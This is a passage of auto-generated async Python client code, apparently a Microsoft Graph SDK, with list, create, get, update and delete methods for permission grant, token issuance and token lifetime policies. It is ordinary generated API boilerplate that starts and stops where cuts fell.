cls = kwargs.pop('cls', None) # type: ClsType["models.collectionofpermissiongrantpolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_permission_grant_policies.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if self._config.top is not None:
query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
if self._config.skip is not None:
query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
if self._config.search is not None:
query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
if self._config.filter is not None:
query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
if self._config.count is not None:
query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('collectionofpermissiongrantpolicy', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.odata_next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.odataerror, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_permission_grant_policies.metadata = {'url': '/policies/permissionGrantPolicies'} # type: ignore
async def create_permission_grant_policies(
self,
body: "models.microsoftgraphpermissiongrantpolicy",
**kwargs
) -> "models.microsoftgraphpermissiongrantpolicy":
"""Create new navigation property to permissionGrantPolicies for policies.
Create new navigation property to permissionGrantPolicies for policies.
:param body: New navigation property.
:type body: ~identity_sign_ins.models.microsoftgraphpermissiongrantpolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: microsoftgraphpermissiongrantpolicy, or the result of cls(response)
:rtype: ~identity_sign_ins.models.microsoftgraphpermissiongrantpolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.microsoftgraphpermissiongrantpolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_permission_grant_policies.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'microsoftgraphpermissiongrantpolicy')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('microsoftgraphpermissiongrantpolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_permission_grant_policies.metadata = {'url': '/policies/permissionGrantPolicies'} # type: ignore
async def get_permission_grant_policies(
self,
permission_grant_policy_id: str,
select: Optional[List[Union[str, "models.Enum136"]]] = None,
expand: Optional[List[Union[str, "models.Enum137"]]] = None,
**kwargs
) -> "models.microsoftgraphpermissiongrantpolicy":
"""Get permissionGrantPolicies from policies.
Get permissionGrantPolicies from policies.
:param permission_grant_policy_id: key: id of permissionGrantPolicy.
:type permission_grant_policy_id: str
:param select: Select properties to be returned.
:type select: list[str or ~identity_sign_ins.models.Enum136]
:param expand: Expand related entities.
:type expand: list[str or ~identity_sign_ins.models.Enum137]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: microsoftgraphpermissiongrantpolicy, or the result of cls(response)
:rtype: ~identity_sign_ins.models.microsoftgraphpermissiongrantpolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.microsoftgraphpermissiongrantpolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.get_permission_grant_policies.metadata['url'] # type: ignore
path_format_arguments = {
'permissionGrantPolicy-id': self._serialize.url("permission_grant_policy_id", permission_grant_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('microsoftgraphpermissiongrantpolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_permission_grant_policies.metadata = {'url': '/policies/permissionGrantPolicies/{permissionGrantPolicy-id}'} # type: ignore
async def update_permission_grant_policies(
self,
permission_grant_policy_id: str,
body: "models.microsoftgraphpermissiongrantpolicy",
**kwargs
) -> None:
"""Update the navigation property permissionGrantPolicies in policies.
Update the navigation property permissionGrantPolicies in policies.
:param permission_grant_policy_id: key: id of permissionGrantPolicy.
:type permission_grant_policy_id: str
:param body: New navigation property values.
:type body: ~identity_sign_ins.models.microsoftgraphpermissiongrantpolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_permission_grant_policies.metadata['url'] # type: ignore
path_format_arguments = {
'permissionGrantPolicy-id': self._serialize.url("permission_grant_policy_id", permission_grant_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'microsoftgraphpermissiongrantpolicy')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
update_permission_grant_policies.metadata = {'url': '/policies/permissionGrantPolicies/{permissionGrantPolicy-id}'} # type: ignore
async def delete_permission_grant_policies(
self,
permission_grant_policy_id: str,
if_match: Optional[str] = None,
**kwargs
) -> None:
"""Delete navigation property permissionGrantPolicies for policies.
Delete navigation property permissionGrantPolicies for policies.
:param permission_grant_policy_id: key: id of permissionGrantPolicy.
:type permission_grant_policy_id: str
:param if_match: ETag.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.delete_permission_grant_policies.metadata['url'] # type: ignore
path_format_arguments = {
'permissionGrantPolicy-id': self._serialize.url("permission_grant_policy_id", permission_grant_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
delete_permission_grant_policies.metadata = {'url': '/policies/permissionGrantPolicies/{permissionGrantPolicy-id}'} # type: ignore
def list_token_issuance_policies(
self,
orderby: Optional[List[Union[str, "models.Enum144"]]] = None,
select: Optional[List[Union[str, "models.Enum145"]]] = None,
expand: Optional[List[Union[str, "models.Enum146"]]] = None,
**kwargs
) -> AsyncIterable["models.collectionoftokenissuancepolicy"]:
"""Get tokenIssuancePolicies from policies.
Get tokenIssuancePolicies from policies.
:param orderby: Order items by property values.
:type orderby: list[str or ~identity_sign_ins.models.Enum144]
:param select: Select properties to be returned.
:type select: list[str or ~identity_sign_ins.models.Enum145]
:param expand: Expand related entities.
:type expand: list[str or ~identity_sign_ins.models.Enum146]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either collectionoftokenissuancepolicy or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~identity_sign_ins.models.collectionoftokenissuancepolicy]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.collectionoftokenissuancepolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_token_issuance_policies.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if self._config.top is not None:
query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
if self._config.skip is not None:
query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
if self._config.search is not None:
query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
if self._config.filter is not None:
query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
if self._config.count is not None:
query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('collectionoftokenissuancepolicy', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.odata_next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.odataerror, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_token_issuance_policies.metadata = {'url': '/policies/tokenIssuancePolicies'} # type: ignore
async def create_token_issuance_policies(
self,
body: "models.microsoftgraphtokenissuancepolicy",
**kwargs
) -> "models.microsoftgraphtokenissuancepolicy":
"""Create new navigation property to tokenIssuancePolicies for policies.
Create new navigation property to tokenIssuancePolicies for policies.
:param body: New navigation property.
:type body: ~identity_sign_ins.models.microsoftgraphtokenissuancepolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: microsoftgraphtokenissuancepolicy, or the result of cls(response)
:rtype: ~identity_sign_ins.models.microsoftgraphtokenissuancepolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.microsoftgraphtokenissuancepolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_token_issuance_policies.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'microsoftgraphtokenissuancepolicy')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('microsoftgraphtokenissuancepolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_token_issuance_policies.metadata = {'url': '/policies/tokenIssuancePolicies'} # type: ignore
async def get_token_issuance_policies(
self,
token_issuance_policy_id: str,
select: Optional[List[Union[str, "models.Enum147"]]] = None,
expand: Optional[List[Union[str, "models.Enum148"]]] = None,
**kwargs
) -> "models.microsoftgraphtokenissuancepolicy":
"""Get tokenIssuancePolicies from policies.
Get tokenIssuancePolicies from policies.
:param token_issuance_policy_id: key: id of tokenIssuancePolicy.
:type token_issuance_policy_id: str
:param select: Select properties to be returned.
:type select: list[str or ~identity_sign_ins.models.Enum147]
:param expand: Expand related entities.
:type expand: list[str or ~identity_sign_ins.models.Enum148]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: microsoftgraphtokenissuancepolicy, or the result of cls(response)
:rtype: ~identity_sign_ins.models.microsoftgraphtokenissuancepolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.microsoftgraphtokenissuancepolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.get_token_issuance_policies.metadata['url'] # type: ignore
path_format_arguments = {
'tokenIssuancePolicy-id': self._serialize.url("token_issuance_policy_id", token_issuance_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('microsoftgraphtokenissuancepolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_token_issuance_policies.metadata = {'url': '/policies/tokenIssuancePolicies/{tokenIssuancePolicy-id}'} # type: ignore
async def update_token_issuance_policies(
self,
token_issuance_policy_id: str,
body: "models.microsoftgraphtokenissuancepolicy",
**kwargs
) -> None:
"""Update the navigation property tokenIssuancePolicies in policies.
Update the navigation property tokenIssuancePolicies in policies.
:param token_issuance_policy_id: key: id of tokenIssuancePolicy.
:type token_issuance_policy_id: str
:param body: New navigation property values.
:type body: ~identity_sign_ins.models.microsoftgraphtokenissuancepolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_token_issuance_policies.metadata['url'] # type: ignore
path_format_arguments = {
'tokenIssuancePolicy-id': self._serialize.url("token_issuance_policy_id", token_issuance_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'microsoftgraphtokenissuancepolicy')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
update_token_issuance_policies.metadata = {'url': '/policies/tokenIssuancePolicies/{tokenIssuancePolicy-id}'} # type: ignore
async def delete_token_issuance_policies(
self,
token_issuance_policy_id: str,
if_match: Optional[str] = None,
**kwargs
) -> None:
"""Delete navigation property tokenIssuancePolicies for policies.
Delete navigation property tokenIssuancePolicies for policies.
:param token_issuance_policy_id: key: id of tokenIssuancePolicy.
:type token_issuance_policy_id: str
:param if_match: ETag.
:type if_match: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.delete_token_issuance_policies.metadata['url'] # type: ignore
path_format_arguments = {
'tokenIssuancePolicy-id': self._serialize.url("token_issuance_policy_id", token_issuance_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if if_match is not None:
header_parameters['If-Match'] = self._serialize.header("if_match", if_match, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
delete_token_issuance_policies.metadata = {'url': '/policies/tokenIssuancePolicies/{tokenIssuancePolicy-id}'} # type: ignore
def list_token_lifetime_policies(
self,
orderby: Optional[List[Union[str, "models.Enum149"]]] = None,
select: Optional[List[Union[str, "models.Enum150"]]] = None,
expand: Optional[List[Union[str, "models.Enum151"]]] = None,
**kwargs
) -> AsyncIterable["models.collectionoftokenlifetimepolicy"]:
"""Get tokenLifetimePolicies from policies.
Get tokenLifetimePolicies from policies.
:param orderby: Order items by property values.
:type orderby: list[str or ~identity_sign_ins.models.Enum149]
:param select: Select properties to be returned.
:type select: list[str or ~identity_sign_ins.models.Enum150]
:param expand: Expand related entities.
:type expand: list[str or ~identity_sign_ins.models.Enum151]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either collectionoftokenlifetimepolicy or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~identity_sign_ins.models.collectionoftokenlifetimepolicy]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.collectionoftokenlifetimepolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_token_lifetime_policies.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if self._config.top is not None:
query_parameters['$top'] = self._serialize.query("self._config.top", self._config.top, 'int', minimum=0)
if self._config.skip is not None:
query_parameters['$skip'] = self._serialize.query("self._config.skip", self._config.skip, 'int', minimum=0)
if self._config.search is not None:
query_parameters['$search'] = self._serialize.query("self._config.search", self._config.search, 'str')
if self._config.filter is not None:
query_parameters['$filter'] = self._serialize.query("self._config.filter", self._config.filter, 'str')
if self._config.count is not None:
query_parameters['$count'] = self._serialize.query("self._config.count", self._config.count, 'bool')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, '[str]', div=',')
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('collectionoftokenlifetimepolicy', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.odata_next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(models.odataerror, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_token_lifetime_policies.metadata = {'url': '/policies/tokenLifetimePolicies'} # type: ignore
async def create_token_lifetime_policies(
self,
body: "models.microsoftgraphtokenlifetimepolicy",
**kwargs
) -> "models.microsoftgraphtokenlifetimepolicy":
"""Create new navigation property to tokenLifetimePolicies for policies.
Create new navigation property to tokenLifetimePolicies for policies.
:param body: New navigation property.
:type body: ~identity_sign_ins.models.microsoftgraphtokenlifetimepolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: microsoftgraphtokenlifetimepolicy, or the result of cls(response)
:rtype: ~identity_sign_ins.models.microsoftgraphtokenlifetimepolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.microsoftgraphtokenlifetimepolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_token_lifetime_policies.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'microsoftgraphtokenlifetimepolicy')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('microsoftgraphtokenlifetimepolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_token_lifetime_policies.metadata = {'url': '/policies/tokenLifetimePolicies'} # type: ignore
async def get_token_lifetime_policies(
self,
token_lifetime_policy_id: str,
select: Optional[List[Union[str, "models.Enum152"]]] = None,
expand: Optional[List[Union[str, "models.Enum153"]]] = None,
**kwargs
) -> "models.microsoftgraphtokenlifetimepolicy":
"""Get tokenLifetimePolicies from policies.
Get tokenLifetimePolicies from policies.
:param token_lifetime_policy_id: key: id of tokenLifetimePolicy.
:type token_lifetime_policy_id: str
:param select: Select properties to be returned.
:type select: list[str or ~identity_sign_ins.models.Enum152]
:param expand: Expand related entities.
:type expand: list[str or ~identity_sign_ins.models.Enum153]
:keyword callable cls: A custom type or function that will be passed the direct response
:return: microsoftgraphtokenlifetimepolicy, or the result of cls(response)
:rtype: ~identity_sign_ins.models.microsoftgraphtokenlifetimepolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.microsoftgraphtokenlifetimepolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
accept = "application/json"
# Construct URL
url = self.get_token_lifetime_policies.metadata['url'] # type: ignore
path_format_arguments = {
'tokenLifetimePolicy-id': self._serialize.url("token_lifetime_policy_id", token_lifetime_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if select is not None:
query_parameters['$select'] = self._serialize.query("select", select, '[str]', div=',')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, '[str]', div=',')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('microsoftgraphtokenlifetimepolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_token_lifetime_policies.metadata = {'url': '/policies/tokenLifetimePolicies/{tokenLifetimePolicy-id}'} # type: ignore
async def update_token_lifetime_policies(
self,
token_lifetime_policy_id: str,
body: "models.microsoftgraphtokenlifetimepolicy",
**kwargs
) -> None:
"""Update the navigation property tokenLifetimePolicies in policies.
Update the navigation property tokenLifetimePolicies in policies.
:param token_lifetime_policy_id: key: id of tokenLifetimePolicy.
:type token_lifetime_policy_id: str
:param body: New navigation property values.
:type body: ~identity_sign_ins.models.microsoftgraphtokenlifetimepolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_token_lifetime_policies.metadata['url'] # type: ignore
path_format_arguments = {
'tokenLifetimePolicy-id': self._serialize.url("token_lifetime_policy_id", token_lifetime_policy_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(body, 'microsoftgraphtokenlifetimepolicy')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(models.odataerror, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
update_token_lifetime_policies.metadata = {'url': '/policies/tokenLifetimePolicies/{tokenLifetimePolicy-id}'} # type: ignore
async def delete_token_lifetime_policies(
self,
token_lifetime_policy_id: str,
if_match: Optional[str] = None,
**kwargs
) -> None:
"""Delete navigation property tokenLifetimePolicies for policies.
Delete navigation property tokenLifetimePolicies for policies.
:param token_lifetime_policy_id: key: id of tokenLifetimePolicy.
:type token_lifetime_policy_id: str
:param if_match: ETag.
:type if_match: str
